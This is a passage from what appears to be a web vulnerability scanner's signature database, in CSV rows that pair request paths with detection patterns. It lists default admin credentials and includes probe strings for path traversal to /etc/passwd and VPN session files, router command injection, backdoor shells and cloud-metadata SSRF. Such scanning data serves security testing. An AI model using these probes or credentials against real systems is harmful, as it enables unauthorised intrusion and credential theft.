https://packetstormsecurity.com/files/123650/Oracle-Portal-Demo-Organization-Chart-PL-SQL-Injection.html\",\"\",\"\"\n\"007150\",\"0\",\"bde\",\"/api/jsonws/\",\"GET\",\"json-web-services-api\",\"\",\"\",\"\",\"\",\"LifeRay WebServices API found.\",\"\",\"\"\n\"007151\",\"0\",\"bde\",\"/api/jsonws/index.jsp\",\"GET\",\"json-web-services-api\",\"\",\"\",\"\",\"\",\"LifeRay WebServices API found.\",\"\",\"\"\n\"007152\",\"0\",\"5\",\"//WEB-INF/web.xml\",\"GET\",\"j2ee\",\"\",\"\",\"\",\"\",\"A web.xml file was retrieved from the WEB-INF directory by prepending an additional slash.\",\"\",\"\"\n\"007153\",\"0\",\"e\",\"/webconsole/vsplogin.action\",\"GET\",\"Avaya\",\"\",\"Web Console\",\"\",\"\",\"Avaya web console found. Default credential is admin:admin01\",\"\",\"\"\n\"007154\",\"0\",\"e\",\"/cgi-bin/common/login/webLogin\",\"GET\",\"Avaya\",\"\",\"System Management Interface\",\"\",\"\",\"Avaya management interface found. Default credential is admin:admin01\",\"\",\"\"\n\"007155\",\"0\",\"e\",\"/php/login.php\",\"GET\",\"Creating administrative session\",\"\",\"bug fix 2157\",\"\",\"\",\"Palo Alto Networks firewall web admin page found\",\"\",\"\"\n\"007156\",\"0\",\"e\",\"/ui/\",\"GET\",\"Infoblox System Manager\",\"\",\"Infoblox WebUI Login Page ID\",\"\",\"\",\"Infoblox web console found. Default credential is admin:infoblox\",\"\",\"\"\n\"007157\",\"0\",\"e\",\"/WebLM/\",\"GET\",\"Web License Manager \\(WebLM\\)\",\"\",\"Avaya\",\"\",\"\",\"Avaya license managing console found. Default credential is admin:weblmadmin\",\"\",\"\"\n\"007158\",\"0\",\"e\",\"/g450.html\",\"GET\",\"Avaya G450\\/G350 - Avaya Device Management\",\"\",\"routerIp\",\"\",\"\",\"Avaya web console found. Default SNMP community string is public\",\"\",\"\"\n\"007159\",\"0\",\"e\",\"/local-login/\",\"GET\",\"Unified Communications Management\",\"\",\"Avaya\",\"\",\"\",\"Avaya System Manager web console found. Default credential is admin:admin\",\"\",\"\"\n\"007160\",\"0\",\"3\",\"@WORDPRESSwp-content/plugins/simply-static/debug.txt\",\"GET\",\"class-ss-archive\",\"\",\"\",\"\",\"\",\"Wordpress Simply Static debug log may reveal site information\",\"\",\"\"\n\"007161\",\"0\",\"0\",\"/Editor/assetmanager/assetmanager.asp\",\"GET\",\"Upload\\sFile\",\"\",\"\",\"\",\"\",\"InnovaStudio file uploader found\",\"\",\"\"\n\"007162\",\"0\",\"0\",\"/Telerik.Web.UI.DialogHandler.aspx\",\"GET\",\"200\",\"\",\"Loading the dialog\",\"\",\"\",\"Telerik UI for ASP.NET AJAX Dialog Handler: application may allow file uploads\",\"\",\"\"\n\"007163\",\"0\",\"0\",\"/Telerik.Web.UI.DialogHandler.aspx?dp=////\",\"GET\",\"200\",\"\",\"Base-64\",\"cannot be less than zero\",\"\",\"Telerik UI for ASP.NET AJAX CVE-2017-9248: poor crypto may lead to arbitrary file uploads\",\"\",\"\"\n\"007164\",\"0\",\"0\",\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\",\"GET\",\"200\",\"\",\"Loading the dialog\",\"\",\"\",\"Telerik UI for ASP.NET AJAX Dialog Handler: application may allow file uploads\",\"\",\"\"\n\"007165\",\"0\",\"0\",\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////\",\"GET\",\"200\",\"\",\"Base-64\",\"cannot be less than zero\",\"\",\"Telerik UI for ASP.NET AJAX CVE-2017-9248: poor crypto may lead to arbitrary file uploads\",\"\",\"\"\n\"007166\",\"0\",\"be\",\"/_adminer.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007167\",\"0\",\"be\",\"/livehelp/admin/index.php\",\"GET\",\"<title>Live\\sHelp\\sWeb\\sApp\",\"\",\"\",\"\",\"\",\"Chatstack live chat software admin interface found.\",\"\",\"\"\n\"007168\",\"0\",\"123\",\"/.config.local.php.swp\",\"GET\",\"db_host\",\"\",\"db_user\",\"\",\"\",\"CS Cart config.local.php swap file found.\",\"\",\"\"\n\"007169\",\"0\",\"be\",\"/ad.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007170\",\"0\",\"be\",\"/adminer-4.2.5-en.phpp\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007171\",\"0\",\"be\",\"/addminer-4.2.5-mysqlphp\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007172\",\"0\",\"be\",\"/adminer-4.2.5.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007173\",\"0\",\"be\",\"/adminer-4.3.0-en.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007174\",\"0\",\"be\",\"/adminer-4.3.0-mysql-en.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007175\",\"0\",\"be\",\"/adminer-4.3.0-mysql.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007176\",\"0\",\"be\",\"/adminer-4.3.0.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007177\",\"0\",\"be\",\"/adminer-4.3.1.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007178\",\"0\",\"be\",\"/adminer-4.3.1-en.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007179\",\"0\",\"be\",\"/adminer-4.3.1-mysql-en.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007180\",\"0\",\"be\",\"/adminer-4.3.1-mysql.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007181\",\"0\",\"be\",\"/Adminer.php\",\"GET\",\"<title>Select\\sdatabase\\s-\",\"\",\"www\\.adminer\\.org\",\"\",\"\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007182\",\"0\",\"8a\",\"/wls-wsat/CoordinatorPortType\",\"GET\",\"200\",\"weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl\",\"\",\"\",\"\",\"This application may be vulnerable to CVE-2017-10271.\",\"\",\"\"\n\"007183\",\"0\",\"8a\",\"/wls-wsat/RegistrationPortTypeRPC\",\"GET\",\"200\",\"weblogic.wsee.wstx.wsat.v10.endpoint.RegistrationPortTypeRPCPortImpl\",\"\",\"\",\"\",\"This application may be vulnerable to CVE-2017-10271.\",\"\",\"\"\n\"007184\",\"0\",\"8a\",\"/wls-wsat/ParticipantPortType\",\"GET\",\"200\",\"weblogic.wsee.wstx.wsat.v10.endpoint.ParticipantPortTypePortImpl\",\"\",\"\",\"\",\"This application may be vulnerable to CVE-2017-10271.\",\"\",\"\"\n\"007185\",\"0\",\"8a\",\"/wls-wsat/RegistrationRequesterPortType\",\"GET\",\"200\",\"weblogic.wsee.wstx.wsat.v10.endpoint.RegistrationRequesterPortTypePortImpl\",\"\",\"\",\"\",\"This application may be vulnerable to CVE-2017-10271.\",\"\",\"\"\n\"007186\",\"0\",\"8a\",\"/wls-wsat/CoordinatorPortType11\",\"GET\",\"200\",\"weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortType11PortImpl\",\"\",\"\",\"\",\"This application may be vulnerable to CVE-2017-10271.\",\"\",\"\"\n\"007187\",\"0\",\"8a\",\"/wls-wsat/RegistrationPortTypeRPC11\",\"GET\",\"200\",\"weblogic.wsee.wstx.wsat.v10.endpoint.RegistrationPortTypeRPC11PortImpl\",\"\",\"\",\"\",\"This application may be vulnerable to CVE-2017-10271.\",\"\",\"\"\n\"007188\",\"0\",\"8a\",\"/wls-wsat/ParticipantPortType11\",\"GET\",\"200\",\"weblogic.wsee.wstx.wsat.v10.endpoint.ParticipantPortType11PortImpl\",\"\",\"\",\"\",\"This application may be vulnerable to CVE-2017-10271.\",\"\",\"\"\n\"007189\",\"0\",\"1b\",\"@CGIDIRSfilemanager/Manager.pl\",\"GET\",\"iDC File Manager is a powerful multilingual web based system\",\"\",\"\",\"\",\"\",\"iDC File Manager found\",\"\",\"\"\n\"007190\",\"0\",\"3b\",\"/common/about\",\"GET\",\"KACE\\sSystems\",\"\",\"\",\"\",\"\",\"Dell KACE Systems Management Appliance version information\",\"\",\"\"\n\"007191\",\"0\",\"3\",\"/master.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007192\",\"0\",\"3\",\"/masters.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007193\",\"0\",\"3\",\"/connections.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007194\",\"0\",\"3\",\"/connection.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007195\",\"0\",\"3\",\"/passwords.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007196\",\"0\",\"3\",\"/PasswordsData.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007197\",\"0\",\"3\",\"/users.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007198\",\"0\",\"3\",\"/conndb.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007199\",\"0\",\"3\",\"/conn.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007200\",\"0\",\"3\",\"/security.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007201\",\"0\",\"3\",\"/accounts.xml\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007202\",\"0\",\"3\",\"/db.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007203\",\"0\",\"3\",\"/userdata.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007204\",\"0\",\"3\",\"/login.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007205\",\"0\",\"3\",\"/master.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007206\",\"0\",\"3\",\"/masters.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007207\",\"0\",\"3\",\"/connections.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007208\",\"0\",\"3\",\"/connection.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007209\",\"0\",\"3\",\"/passwords.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007210\",\"0\",\"3\",\"/PasswordsData.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007211\",\"0\",\"3\",\"/users.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007212\",\"0\",\"3\",\"/conndb.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007213\",\"0\",\"3\",\"/conn.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007214\",\"0\",\"3\",\"/security.json\",\"GET\",\"\\\"(authentication|encryption)\\\"(\\s+)?\\:\",\"\",\"\",\"\",\"\",\"JSON config file found..\",\"\",\"\"\n\"007215\",\"0\",\"3\",\"/accounts.json\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"007216\",\"0\",\"3\",\"/package.json\",\"GET\",\"\\\"name\\\"\\:\",\"\",\"\\\"dependencies\\\"\\:\",\"\",\"\",\"Node.js package file found. It may contain sensitive information.\",\"\",\"\"\n\"007217\",\"0\",\"3\",\"/redis_config.json\",\"GET\",\"host\\\"(\\s+)?\\:\",\"\",\"\",\"\",\"\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007218\",\"0\",\"3\",\"/credis/tests/redis_config.json\",\"GET\",\"host\\\"(\\s+)?\\:\",\"\",\"\",\"\",\"\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007219\",\"0\",\"3\",\"/redis/config.json\",\"GET\",\"mount\\\"(\\s+)?\\:\",\"\",\"\",\"\",\"\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007220\",\"0\",\"3\",\"/config/redis.json\",\"GET\",\"host\\\"(\\s+)?\\:\",\"\",\"\",\"\",\"\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007221\",\"0\",\"3\",\"/firebase.json\",\"GET\",\"hosting\\\"(\\s+)?\\:\",\"\",\"\",\"\",\"\",\"Firebase config file found. It may contain sensitive information.\",\"\",\"\"\n\"007222\",\"0\",\"d\",\"/ws.asmx\",\"GET\",\"Web\\sService\",\"\",\"\",\"\",\"\",\"Webservice found\",\"\",\"\"\n\"007223\",\"0\",\"d\",\"/ws/ws.asmx\",\"GET\",\"Web\\sService\",\"\",\"\",\"\",\"\",\"Webservice found\",\"\",\"\"\n\"007224\",\"0\",\"23\",\"/.gitignore\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\".gitignore file found. It is possible to grasp the directory structure.\",\"\",\"\"\n\"007225\",\"0\",\"23\",\"/.hgignore\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\".hgignore file found. It is possible to grasp the directory structure.\",\"\",\"\"\n\"007226\",\"0\",\"23\",\"/.env\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\".env file found. The .env file may contain credentials.\",\"\",\"\"\n\"007227\",\"0\",\"7\",\"@WORDPRESSwp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts\",\"GET\",\"Current Path\",\"127\\.0\\.0\\.1\",\"\",\"\",\"\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007228\",\"0\",\"7\",\"@WORDPRESSwp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts\",\"GET\",\"Current Path\",\"127\\.0\\.0\\.1\",\"\",\"\",\"\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007229\",\"0\",\"7\",\"@WORDPRESSwp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts\",\"GET\",\"Current Path\",\"127\\.0\\.0\\.1\",\"\",\"\",\"\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007230\",\"0\",\"7\",\"@WORDPRESSwp-license.php?file=/\",\"GET\",\"href=\\\"?file=/\",\"\",\"\",\"\",\"\",\"A PHP backdoor file manager was likely found.\",\"\",\"\"\n\"007231\",\"0\",\"7\",\"/assets/mobirise/css/meta.php?filesrc=\",\"GET\",\"Current Path\",\"127\\.0\\.0\\.1\",\"\",\"\",\"\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007232\",\"0\",\"7\",\"/Meuhy.php\",\"GET\",\"404-server!!\",\"\",\"\",\"\",\"\",\"A PHP backdoor file manager was likely found.\",\"\",\"\"\n\"007233\",\"0\",\"3\",\"/HNAP1/\",\"GET\",\"GetDeviceSettingResult\",\"\",\"\",\"\",\"\",\"HNAP1 router information often displays sensitive information.\",\"\",\"\"\n\"007234\",\"0\",\"8\",\"/login.cgi?cli=aa%20aa%27cat%20/etc/hosts\",\"GET\",\"127\\.0\\.0\\.1\",\"\",\"\",\"\",\"\",\"Some D-Link router remote command execution.\",\"\",\"\"\n\"007235\",\"0\",\"8\",\"/shell?cat+/etc/hosts\",\"GET\",\"127\\.0\\.0\\.1\",\"\",\"\",\"\",\"\",\"A backdoor was identified.\",\"\",\"\"\n\"007236\",\"0\",\"3\",\"/currentsetting.htm\",\"GET\",\"Model=\",\"\",\"\",\"\",\"\",\"Netgear information disclosure.\",\"\",\"\"\n\"007237\",\"0\",\"3\",\"/device_description.xml\",\"GET\",\"modelDescription\",\"\",\"\",\"\",\"\",\"Sonos information disclosure.\",\"\",\"\"\n\"007238\",\"0\",\"3\",\"/evox/about\",\"GET\",\"serverName\",\"\",\"\",\"\",\"\",\"Trane Tracer information disclosure.\",\"\",\"\"\n\"007239\",\"0\",\"3\",\"/.well-known/security.txt\",\"GET\",\"contact:\",\"\",\"\",\"\",\"\",\"Potential .well-known information disclosure.\",\"\",\"\"\n\"007240\",\"0\",\"7\",\"/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=\",\"GET\",\"wave=\",\"\",\"\",\"\",\"\",\"Argus Surveillance DVR 4.0.0.0 contains a local file retrieval vulnerability\",\"\",\"\"\n\"007241\",\"0\",\"1\",\"/util/xmlrpc/Handler.ashx\",\"GET\",\"EPiServer XMLRPC\",\"\",\"\",\"\",\"\",\"EpiServer API discovered\",\"\",\"\"\n\"007242\",\"0\",\"3\",\"/.well-known/openid-configuration\",\"GET\",\"issuer\",\"\",\"\",\"\",\"\",\"OpenID Provider Configuration Information.\",\"\",\"\"\n\"007243\",\"0\",\"3\",\"/.well-known/oauth-authorization-server\",\"GET\",\"issuer\",\"\",\"\",\"\",\"\",\"OAuth 2.0 Authorization Server Metadata.\",\"\",\"\"\n\"007244\",\"0\",\"e\",\"/ibm/console/logon.jsp\",\"GET\",\"action=\\\"/ibm/console/j_security_check\",\"\",\"\",\"\",\"\",\"IBM WebSphere admin console\",\"\",\"\"\n\"007245\",\"0\",\"f\",\"/util/xmlrpc/Handler.ashx\",\"GET\",\"EPiServer.Blog 7.0(\\.([0-4]|5([0-7]|8[1-5])))?\",\"\",\"\",\"\",\"\",\"EpiServer Blog 7.0.586 and below may contain an XXE vulnerability in the blog module, which is accessible even if the module is not activated. See https://seclists.org/fulldisclosure/2018/Sep/17\",\"\",\"\"\n\"007246\",\"0\",\"23\",\"/cgi-bin/config.exp\",\"GET\",\"sysconfig\",\"\",\"\",\"\",\"\",\"Cisco RV320/RV325 router is vulnerable to CVE-2019-1653\",\"\",\"\"\n\"007247\",\"0\",\"8a\",\"/_async/AsyncResponseServiceJms?WSDL\",\"GET\",\"200\",\"www.bea.com/async/AsyncResponseService\",\"\",\"\",\"\",\"This application may be vulnerable to CNVD-C-2019-48814.\",\"\",\"\"\n\"007248\",\"0\",\"23\",\"@WORDPRESS.wp-config.php.swp\",\"GET\",\"DB_PASSWORD\",\"\",\"\",\"\",\"\",\".wp-config.php.swp file found. This file is swap file created when editing with vi/vim editor. This file contains the credentials.\",\"\",\"\"\n\"007249\",\"0\",\"23\",\"@WORDPRESSwp-config.php~\",\"GET\",\"DB_PASSWORD\",\"\",\"\",\"\",\"\",\"wp-config.php~ file found. This file is a backup file created when editing with emacs editor. This file contains the credentials.\",\"\",\"\"\n\"007250\",\"0\",\"23\",\"@WORDPRESSwp-config.php.bak\",\"GET\",\"DB_PASSWORD\",\"\",\"\",\"\",\"\",\"wp-config.php.bak file found. This file contains the credentials.\",\"\",\"\"\n\"007251\",\"0\",\"23\",\"@WORDPRESSwp-config.php.bakup\",\"GET\",\"DB_PASSWORD\",\"\",\"\",\"\",\"\",\"wp-config.php.bakup file found. This file contains the credentials.\",\"\",\"\"\n\"007252\",\"0\",\"23\",\"@WORDPRESS#wp-config.php#\",\"GET\",\"DB_PASSWORD\",\"\",\"\",\"\",\"\",\"#wp-config.php# file found. This file contains the credentials.\",\"\",\"\"\n\"007253\",\"0\",\"23\",\"@WORDPRESSwp-config.php_bak\",\"GET\",\"DB_PASSWORD\",\"\",\"\",\"\",\"\",\"wp-config.php_bak file found. This file contains the credentials.\",\"\",\"\"\n\"007254\",\"0\",\"3\",\"http://100.100.100.200/latest/meta-data/\",\"GET\",\"user-data\",\"\",\"\",\"\",\"\",\"The Alibaba Cloud host is configured as a reverse proxy (SSRF) which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 100.100.100.200\\r\\naccept: */*\\r\\nProxy-Connection: Keep-Alive\\r\\n\"\n\"007255\",\"0\",\"1\",\"/.tools/webmail\",\"GET\",\"200\",\"\",\"webmail\",\"\",\"\",\"Webmail Found. Possibly on Media Temple/Gridserver.\",\"\",\"\"\n\"007256\",\"0\",\"3\",\"/apple-app-site-association\",\"GET\",\"200\",\"\",\"applinks\",\"\",\"\",\"Apple Universal Links.\",\"\",\"\"\n\"007257\",\"0\",\"3\",\"/.well-known/apple-app-site-association\",\"GET\",\"200\",\"\",\"applinks\",\"\",\"\",\"Apple Universal Links.\",\"\",\"\"\n\"007258\",\"0\",\"3\",\"/.well-known/assetlinks.json\",\"GET\",\"200\",\"\",\"relation\",\"\",\"\",\"Android App Links.\",\"\",\"\"\n\"007259\",\"0\",\"be\",\"/\",\"GET\",\"share\\.router\",\"router\\.copyright\",\"image/cisco_logo_about\\.png\",\"\",\"\",\"Cisco (RV) router login page detected.\",\"\",\"\"\n\"007260\",\"0\",\"235\",\"/_syslog.txt\",\"GET\",\"[0-9]{4}-[0-9]{2}-[0-9]{2}\\s[0-9:]+\\sRV[0-9]+W\",\"\",\"200\",\"\",\"\",\"Cisco RV110W/RV130W/RV215W router is vulnerable to CVE-2019-1898. See: https://www.tenable.com/security/research/tra-2019-29\",\"\",\"\"\n\"007261\",\"0\",\"be\",\"/remote/login?lang=en\",\"GET\",\"(<span>Launch\\sFortiClient</span>|launchFortiClient\\(\\)|/remote/fgt_lang)\",\"\",\"200\",\"\",\"\",\"FortiOS SSL VPN login page detected.\",\"\",\"\"\n\"007262\",\"0\",\"2357\",\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\",\"GET\",\"var\\sfgt_lang\\s=\",\"\",\"200\",\"\",\"\",\"FortiOS SSL VPN is vulnerable to CVE-2018-13379. See: https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html\",\"\",\"\"\n\"007263\",\"0\",\"be\",\"/dana-na/auth/url_default/welcome.cgi\",\"GET\",\"<title>Pulse\\sConnect\\sSecure\",\"\",\"<b>Welcome\\sto</b>\",\"\",\"\",\"Pulse Connect Secure login page detected.\",\"\",\"\"\n\"007264\",\"0\",\"2357\",\"/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/\",\"GET\",\"root:.*:0:[01]:\",\"\",\"\",\"\",\"\",\"Pulse Connect Secure is vulnerable to CVE-2019-11510. See: https://www.exploit-db.com/exploits/47297\",\"\",\"\"\n\"007265\",\"0\",\"be\",\"/app/ui/login.jsp\",\"GET\",\"<!--.+login\\spage\\s-->\",\"Cisco\\sUCS\\sDirector\",\"200\",\"\",\"\",\"Generic login page (possible Cisco UCS Director) detected.\",\"\",\"\"\n\"007266\",\"0\",\"3\",\"http://169.254.169.254/hetzner/v1/metadata/private-networks\",\"GET\",\"alias_ips:\",\"\",\"\",\"\",\"\",\"The Hetzner Cloud host is configured as a reverse proxy (SSRF) which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\naccept: */*\\r\\nProxy-Connection: Keep-Alive\\r\\n\"\n\"007267\",\"0\",\"3\",\"http://192.0.0.192/latest/\",\"GET\",\"user-data\",\"\",\"\",\"\",\"\",\"The Oracle Cloud host is configured as a reverse proxy (SSRF) which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: \\192.0.0.192\\r\\naccept: */*\\r\\nProxy-Connection: Keep-Alive\\r\\n\"\n\"007268\",\"0\",\"3\",\"http://169.254.169.254/metadata/instance?api-version=2017-08-01\",\"GET\",\"instance\\/\",\"\",\"\",\"\",\"\",\"The Azure host is configured as a reverse proxy (SSRF) which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 169.254.169.254\\r\\naccept: */*\\r\\nProxy-Connection: Keep-Alive\\r\\nMetadata: true\\r\\n\"\n\"007269\",\"0\",\"8\",\"/vpn/../vpns/cfg/smb.conf\",\"GET\",\"(name\\sresolve\\sorder|encrypt\\spasswords)\\s*=\",\"^\\[global\\]\",\"200\",\"\",\"\",\"Citrix ADC and Citrix Gateway are vulnerable to CVE-2019-19781. See: https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/\",\"\",\"\"\n\"007270\",\"0\",\"23\",\"/whoAmI\",\"GET\",\"IsAuthenticated\",\"\",\"\",\"\",\"\",\"The Jenkins \\\"Who Am I?\\\" page is exposed and may reveal system/app information.\",\"\",\"\"\n\"007271\",\"0\",\"3\",\"/.coveralls.yml\",\"GET\",\"repo_token\",\"\",\"\",\"\",\"\",\"A Coveralls.io file is exposed and contains a repository token, which could allow access to source control\",\"\",\"\"\n\"007272\",\"0\",\"3\",\"/nginx_status\",\"GET\",\"Active\\sconn\",\"\",\"\",\"\",\"\",\"Nginx status page found\",\"\",\"\"\n\"007273\",\"0\",\"3\",\"/Dockerfile\",\"GET\",\"FROM\\s\",\"ENTRYPOINT\\s\",\"ENV\\s\",\"\",\"\",\"Dockerfile found.\",\"\",\"\"\n\"007274\",\"0\",\"3\",\"/cdn-cgi/trace\",\"GET\",\"visit_scheme=\",\"\",\"\",\"\",\"\",\"Cloudflare trace CGI found, which may leak some system information.\",\"\",\"\"\n\"007275\",\"0\",\"3\",\"/v1/tasks\",\"GET\",\"KnownStatus\",\"\",\"\",\"\",\"\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"\",\"\"\n\"007276\",\"0\",\"3\",\"/v2/tasks\",\"GET\",\"KnownStatus\",\"\",\"\",\"\",\"\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"\",\"\"\n\"007277\",\"0\",\"3\",\"/v3/tasks\",\"GET\",\"KnownStatus\",\"\",\"\",\"\",\"\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"\",\"\"\n\"007278\",\"0\",\"3\",\"/v4/tasks\",\"GET\",\"KnownStatus\",\"\",\"\",\"\",\"\",\"Amazon Elastic Container Service metadata URL found which may leak open ports and other information. See https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-metadata-endpoint.html\",\"\",\"\"\n\"007279\",\"0\",\"23\",\"/.dockerignore\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\".dockerignore file found. It may be possible to grasp the directory structure and learn more about the site.\",\"\",\"\"\n\"007280\",\"0\",\"7\",\"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts\",\"GET\",\"\\{\\\"output\\\":\\\"\",\"\",\"\",\"\",\"\",\"The F5 Big-IP's TMUI is vulnerable to a local file inclusion vulnerability and likely command exec. CVE-2020-5902.\",\"\",\"\"\n\"007281\",\"0\",\"be\",\"/\",\"GET\",\"BIG-IP&reg;- Redirect\",\"\",\"200\",\"\",\"\",\"F5 BIG-IP Traffic Management User Interface (TMUI) detected.\",\"\",\"\"\n\"007282\",\"0\",\"1\",\"/var/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"/var directory has indexing enabled.\",\"\",\"\"\n\"007283\",\"0\",\"1\",\"/var/log/\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"/var 